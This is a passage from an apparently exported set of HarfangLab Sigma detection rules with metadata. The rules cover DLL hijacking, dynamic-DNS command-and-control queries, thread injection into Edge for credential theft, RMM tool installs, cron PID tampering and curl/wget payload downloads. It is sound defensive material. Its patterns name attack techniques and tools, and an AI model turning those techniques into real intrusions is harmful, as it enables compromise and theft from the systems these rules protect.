"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.089490Z",
"creation_date": "2026-03-23T11:45:34.089493Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.089499Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_wallpaperhost.yml",
"content": "title: DLL Hijacking via WallpaperHost.exe\nid: bc584877-b80e-43ee-93ae-a442c27df4bd\ndescription: |\n Detects potential Windows DLL Hijacking via WallpaperHost.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'WallpaperHost.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\shell32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "bc584877-b80e-43ee-93ae-a442c27df4bd",
"rule_name": "DLL Hijacking via WallpaperHost.exe",
"rule_description": "Detects potential Windows DLL Hijacking via WallpaperHost.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "bc5e24a5-f7a9-4a3b-aeec-0bc59fe7bb2e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.625022Z",
"creation_date": "2026-03-23T11:45:34.625023Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.625028Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1071/004/"
],
"name": "t1071_004_dyndns_windows_folder.yml",
"content": "title: DNS Request to a Dynamic DNS Service by a Windows Binary\nid: bc5e24a5-f7a9-4a3b-aeec-0bc59fe7bb2e\ndescription: |\n Detects a DNS request to dynamic DNS service by a process located in Windows folder.\n Adversaries may use DynDNS service to host their C2 server or deploy additional malicious code.\n It is recommended check process doing the DNS request for any other suspicious activities.\nreferences:\n - https://attack.mitre.org/techniques/T1071/004/\ndate: 2025/04/09\nmodified: 2025/12/10\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1071.004\n - classification.Windows.Source.DnsQuery\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n category: dns_query\n product: windows\ndetection:\n selection:\n QueryName|endswith:\n - '.freeddns.org'\n - '.ddns.net'\n - '.duckdns.org'\n ProcessImage|startswith: '?:\\windows\\'\n\n filter_excpected_bin:\n - ProcessImage:\n - '?:\\Windows\\System32\\ipconfig.exe'\n - '?:\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n - '?:\\Windows\\System32\\PING.EXE'\n - '?:\\Windows\\System32\\svchost.exe'\n - '?:\\Windows\\System32\\mstsc.exe'\n - '?:\\Windows\\System32\\curl.exe'\n - '?:\\Windows\\System32\\TRACERT.EXE'\n - '?:\\Windows\\System32\\OpenSSH\\ssh.exe'\n - '?:\\Windows\\SysWOW64\\ipconfig.exe'\n - '?:\\Windows\\SysWOW64\\wbem\\WmiPrvSE.exe'\n - '?:\\Windows\\SysWOW64\\PING.EXE'\n - '?:\\Windows\\SysWOW64\\mstsc.exe'\n - '?:\\Windows\\SysWOW64\\curl.exe'\n - '?:\\Windows\\SysWOW64\\TRACERT.EXE'\n - '?:\\Windows\\SysWOW64\\OpenSSH\\ssh.exe'\n - ProcessImage: '?:\\Windows\\SysWOW64\\svchost.exe'\n ProcessCommandLine|contains: '-k'\n\n exclusion_kms:\n ProcessImage: '?:\\Windows\\System32\\SppExtComObj.Exe'\n QueryName: 'kms.ddns.net'\n\n exclusion_experiencehost:\n ProcessImage: '?:\\Windows\\SystemApps\\Microsoft.Windows.StartMenuExperienceHost_*\\StartMenuExperienceHost.exe'\n ProcessParentImage: '?:\\Windows\\System32\\svchost.exe'\n\n condition: selection and not 1 of 
filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "bc5e24a5-f7a9-4a3b-aeec-0bc59fe7bb2e",
"rule_name": "DNS Request to a Dynamic DNS Service by a Windows Binary",
"rule_description": "Detects a DNS request to a dynamic DNS service by a process located in the Windows folder.\nAdversaries may use a DynDNS service to host their C2 server or deploy additional malicious code.\nIt is recommended to check the process making the DNS request for any other suspicious activities.\n",
"rule_creation_date": "2025-04-09",
"rule_modified_date": "2025-12-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1071.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "bc730779-ef0e-4f39-aef6-c0c22bcaee97",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.624221Z",
"creation_date": "2026-03-23T11:45:34.624223Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.624227Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://redcanary.com/blog/threat-intelligence/google-chrome-app-bound-encryption/",
"https://attack.mitre.org/techniques/T1055/",
"https://attack.mitre.org/techniques/T1539/"
],
"name": "t1055_suspicious_remote_thread_msedge.yml",
"content": "title: Suspicious Remote Thread Created in Edge\nid: bc730779-ef0e-4f39-aef6-c0c22bcaee97\ndescription: |\n Detects suspicious activity related to thread injection into the Microsoft Edge process.\n Stealers often use this technique to execute malicious code within Edge in order to exfiltrate sensitive data such as credentials, authentication tokens or session cookies.\n It is recommended to investigate the process injecting the thread to determine the legitimacy of this action.\nreferences:\n - https://redcanary.com/blog/threat-intelligence/google-chrome-app-bound-encryption/\n - https://attack.mitre.org/techniques/T1055/\n - https://attack.mitre.org/techniques/T1539/\ndate: 2025/05/16\nmodified: 2025/11/28\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1055\n - attack.credential_access\n - attack.t1539\n - classification.Windows.Source.Thread\n - classification.Windows.Behavior.ProcessInjection\n - classification.Windows.Behavior.SensitiveInformation\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: remote_thread\ndetection:\n selection:\n TargetImage|endswith: '\\msedge.exe'\n\n filter_image:\n SourceImage:\n - '?:\\Program Files\\\\*'\n - '?:\\Program Files (x86)\\\\*'\n - '?:\\Windows\\explorer.exe'\n - '?:\\Windows\\SysWOW64\\TDepend64.exe'\n - '?:\\Windows\\System32\\rdrleakdiag.exe'\n - '?:\\ProgramData\\McAfee\\Agent\\Current\\\\*\\mfeepmpk_utility.exe'\n - '?:\\ProgramData\\McAfeeTmpInstall_Threat Prevention\\mfeepmpk_utility.exe'\n - '?:\\Windows\\WinSxS\\x86_microsoft-windows-servicingstack_*\\TiWorker.exe'\n - '?:\\Windows\\WinSxS\\amd64_microsoft-windows-servicingstack_*\\TiWorker.exe'\n\n filter_module:\n StartFunction: 'LoadLibraryW'\n\n exclusion_uipath:\n SourceImage|endswith: '\\build\\UiPath\\FuncServer_x64.exe'\n StartModule|endswith: '\\build\\UiPath\\aahook_x64.dll'\n\n exclusion_windhawk:\n SourceImage|endswith: 
'\\windhawk.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Michael Maltsev'\n\n exclusion_roblox:\n SourceImage: '?:\\Users\\\\*\\AppData\\Local\\Roblox\\Versions\\version-????????????????\\RobloxPlayerBeta.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Roblox Corporation'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "bc730779-ef0e-4f39-aef6-c0c22bcaee97",
"rule_name": "Suspicious Remote Thread Created in Edge",
"rule_description": "Detects suspicious activity related to thread injection into the Microsoft Edge process.\nStealers often use this technique to execute malicious code within Edge in order to exfiltrate sensitive data such as credentials, authentication tokens or session cookies.\nIt is recommended to investigate the process injecting the thread to determine the legitimacy of this action.\n",
"rule_creation_date": "2025-05-16",
"rule_modified_date": "2025-11-28",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1055",
"attack.t1539"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "bc8b1e6c-7991-4c71-9b13-997e762794d1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.603249Z",
"creation_date": "2026-03-23T11:45:34.603252Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.603260Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.cyber.gc.ca/en/alerts-advisories/alphvblackcat-ransomware-targeting-canadian-industries",
"https://www.crowdstrike.com/blog/analysis-of-intrusion-campaign-targeting-telecom-and-bpo-companies/",
"https://redcanary.com/threat-detection-report/trends/rmm-tools/",
"https://attack.mitre.org/techniques/T1219/002/"
],
"name": "t1219_002_fleetdeck_agent_installer.yml",
"content": "title: FleetDeck Agent Installer Execution\nid: bc8b1e6c-7991-4c71-9b13-997e762794d1\ndescription: |\n Detects the installation of the FleetDeck Agent, a Remote Desktop & Virtual Terminal solution to securely manage and monitor large fleets of computers.\n Attackers can maliciously use remote access software to establish an interactive command and control channel to target systems within networks.\n It is recommended to verify if the installation of this tool is legitimate in this IT environment. If it is the case, it is advised to disable this rule.\nreferences:\n - https://www.cyber.gc.ca/en/alerts-advisories/alphvblackcat-ransomware-targeting-canadian-industries\n - https://www.crowdstrike.com/blog/analysis-of-intrusion-campaign-targeting-telecom-and-bpo-companies/\n - https://redcanary.com/threat-detection-report/trends/rmm-tools/\n - https://attack.mitre.org/techniques/T1219/002/\ndate: 2024/08/28\nmodified: 2025/06/27\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1219.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.RMM.FleetDeck\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - Image|endswith: '\\fleetdeck-agent-*.exe'\n - OriginalFileName: 'fleetdeck_installer'\n - InternalName: 'fleetdeck_installer'\n\n condition: selection\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "bc8b1e6c-7991-4c71-9b13-997e762794d1",
"rule_name": "FleetDeck Agent Installer Execution",
"rule_description": "Detects the installation of the FleetDeck Agent, a Remote Desktop & Virtual Terminal solution to securely manage and monitor large fleets of computers.\nAttackers can maliciously use remote access software to establish an interactive command and control channel to target systems within networks.\nIt is recommended to verify if the installation of this tool is legitimate in this IT environment. If it is the case, it is advised to disable this rule.\n",
"rule_creation_date": "2024-08-28",
"rule_modified_date": "2025-06-27",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1219.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "bc8e174c-7695-4751-861f-bf32256cc7d4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.087106Z",
"creation_date": "2026-03-23T11:45:34.087108Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.087112Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.leonardo.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf",
"https://attack.mitre.org/techniques/T1036/004/",
"https://attack.mitre.org/techniques/T1559/"
],
"name": "t1036_004_var_run_cron_pid_modified.yml",
"content": "title: Cron's PID File Modified\nid: bc8e174c-7695-4751-861f-bf32256cc7d4\ndescription: |\n Detects a suspicious attempt to modify \"/var/run/cron.pid\".\n This file is the PID file of the cron daemon, used to manage the system's scheduled tasks.\n A modification of this file by another process than cron can hint at a process masquerading as cron.\n It is recommended to ensure that the process isn't suspicious and has a legitimate reason to modify this file.\nreferences:\n - https://www.leonardo.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf\n - https://attack.mitre.org/techniques/T1036/004/\n - https://attack.mitre.org/techniques/T1559/\ndate: 2023/12/15\nmodified: 2025/05/26\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1036.004\n - attack.execution\n - attack.t1559\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.Masquerading\n - classification.Linux.Behavior.SystemModification\n - classification.Linux.Behavior.DefenseEvasion\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection:\n - Path:\n - '/var/run/cron.pid'\n - '/run/cron.pid'\n - '/var/run/crond.pid'\n - '/run/crond.pid'\n - TargetPath:\n - '/var/run/cron.pid'\n - '/run/cron.pid'\n - '/var/run/crond.pid'\n - '/run/crond.pid'\n\n filter_read:\n Kind: 'access'\n Permissions: 'read'\n\n filter_cron:\n ProcessImage:\n - '/usr/bin/cron'\n - '/usr/sbin/cron'\n - '/usr/bin/crond'\n - '/usr/sbin/crond'\n - '/bin/busybox'\n\n filter_daemon_ctl:\n ProcessParentImage: '/sbin/start-stop-daemon'\n ProcessGrandparentImage: '/bin/busybox'\n\n exclusion_common:\n ProcessImage: '/bin/rm'\n\n exclusion_rootlesskit:\n # /home//bin/rootlesskit --state-dir=/run/user/1022/dockerd-rootless --net=slirp4netns --mtu=65520 --slirp4netns-sandbox=auto --slirp4netns-seccomp=auto --disable-host-loopback --port-driver=builtin --copy-up=/etc --copy-up=/run --propagation=rslave 
/home//bin/dockerd-rootless.sh\n - ProcessImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n - ProcessParentImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n\n exclusion_docker:\n - ProcessImage:\n - '/usr/bin/dockerd'\n - '/usr/sbin/dockerd'\n - ProcessAncestors|contains:\n - '|/usr/bin/containerd-shim-runc-v2|'\n - '|/usr/bin/crio-conmon|/usr/bin/crio|'\n\n exclusion_bitdefender:\n ProcessImage: '/opt/bitdefender-security-tools/bin/bdsecd'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "bc8e174c-7695-4751-861f-bf32256cc7d4",
"rule_name": "Cron's PID File Modified",
"rule_description": "Detects a suspicious attempt to modify \"/var/run/cron.pid\".\nThis file is the PID file of the cron daemon, used to manage the system's scheduled tasks.\nA modification of this file by another process than cron can hint at a process masquerading as cron.\nIt is recommended to ensure that the process isn't suspicious and has a legitimate reason to modify this file.\n",
"rule_creation_date": "2023-12-15",
"rule_modified_date": "2025-05-26",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1036.004",
"attack.t1559"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "bc940c5f-0f34-4d9b-86f6-bdf95c4f6608",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.600673Z",
"creation_date": "2026-03-23T11:45:34.600676Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.600684Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_wpcmon.yml",
"content": "title: DLL Hijacking via wpcmon.exe\nid: bc940c5f-0f34-4d9b-86f6-bdf95c4f6608\ndescription: |\n Detects potential Windows DLL Hijacking via wpcmon.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'wpcmon.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\samcli.dll'\n - '\\USERENV.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "bc940c5f-0f34-4d9b-86f6-bdf95c4f6608",
"rule_name": "DLL Hijacking via wpcmon.exe",
"rule_description": "Detects potential Windows DLL Hijacking via wpcmon.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers have used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "bc9c8144-794e-4120-bc45-6d1cd92fb32f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.613003Z",
"creation_date": "2026-03-23T11:45:34.613007Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.613014Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1105/",
"https://attack.mitre.org/techniques/T1071/001/"
],
"name": "t1105_suspicious_file_downloaded_via_curl_wget.yml",
"content": "title: Suspicious File Downloaded via Curl or Wget\nid: bc9c8144-794e-4120-bc45-6d1cd92fb32f\ndescription: |\n Detects when curl or wget is used to download a file with a suspicious extension.\n Attackers often need remote tools or configurations that they might download using curl or wget.\n It is recommended to investigate the downloaded file to determine its legitimacy.\nreferences:\n - https://attack.mitre.org/techniques/T1105/\n - https://attack.mitre.org/techniques/T1071/001/\ndate: 2024/06/19\nmodified: 2025/09/10\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1105\n - attack.t1071.001\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.FileDownload\n - classification.Linux.Behavior.CommandAndControl\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection_image:\n Image|endswith:\n - '/wget'\n - '/wget2' # https://discussion.fedoraproject.org/t/f40-change-proposal-wget2-as-wget/96422\n - '/curl'\n\n selection_ext:\n - CommandLine|contains:\n - '.c '\n - '.cpp '\n - '.elf '\n - '.o '\n - '.ko '\n - '.so '\n - CommandLine|endswith:\n - '.c'\n - '.cpp'\n - '.elf'\n - '.o'\n - '.ko'\n - '.so'\n\n condition: all of selection_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "bc9c8144-794e-4120-bc45-6d1cd92fb32f",
"rule_name": "Suspicious File Downloaded via Curl or Wget",
"rule_description": "Detects when curl or wget is used to download a file with a suspicious extension.\nAttackers often need remote tools or configurations that they might download using curl or wget.\nIt is recommended to investigate the downloaded file to determine its legitimacy.\n",
"rule_creation_date": "2024-06-19",
"rule_modified_date": "2025-09-10",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1071.001",
"attack.t1105"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "bcc69e05-74b1-4e8a-a053-2735ce47212e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.297312Z",
"creation_date": "2026-03-23T11:45:35.297314Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.297318Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://docs.microsoft.com/en-us/windows/wsl/install",
"https://docs.microsoft.com/en-us/windows/wsl/install-manual",
"https://en.wikipedia.org/wiki/Windows_Subsystem_for_Linux",
"https://attack.mitre.org/techniques/T1202/"
],
"name": "t1202_wsl_distribution_installation.yml",
"content": "title: Linux Distribution Installed Under WSL\nid: bcc69e05-74b1-4e8a-a053-2735ce47212e\ndescription: |\n Detects the installation of a Linux distribution through WSL (Windows Subsystem For Linux).\n WSL allows running Linux binary executables natively on Windows systems.\n While WSL has legitimate uses for development and administration, threat actors may abuse it to evade Windows security controls and execute malicious code.\n It is recommended to monitor process trees and subsequent WSL activities for signs of malicious behavior.\nreferences:\n - https://docs.microsoft.com/en-us/windows/wsl/install\n - https://docs.microsoft.com/en-us/windows/wsl/install-manual\n - https://en.wikipedia.org/wiki/Windows_Subsystem_for_Linux\n - https://attack.mitre.org/techniques/T1202/\ndate: 2025/01/13\nmodified: 2026/03/03\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1202\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject|contains: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Lxss\\\\*\\DistributionName'\n\n # This is handled by rule 6bab01c3-5165-4dfd-a77a-42077f50025a\n filter_hacking:\n Details|contains:\n - 'kali-linux'\n - 'Athena'\n - 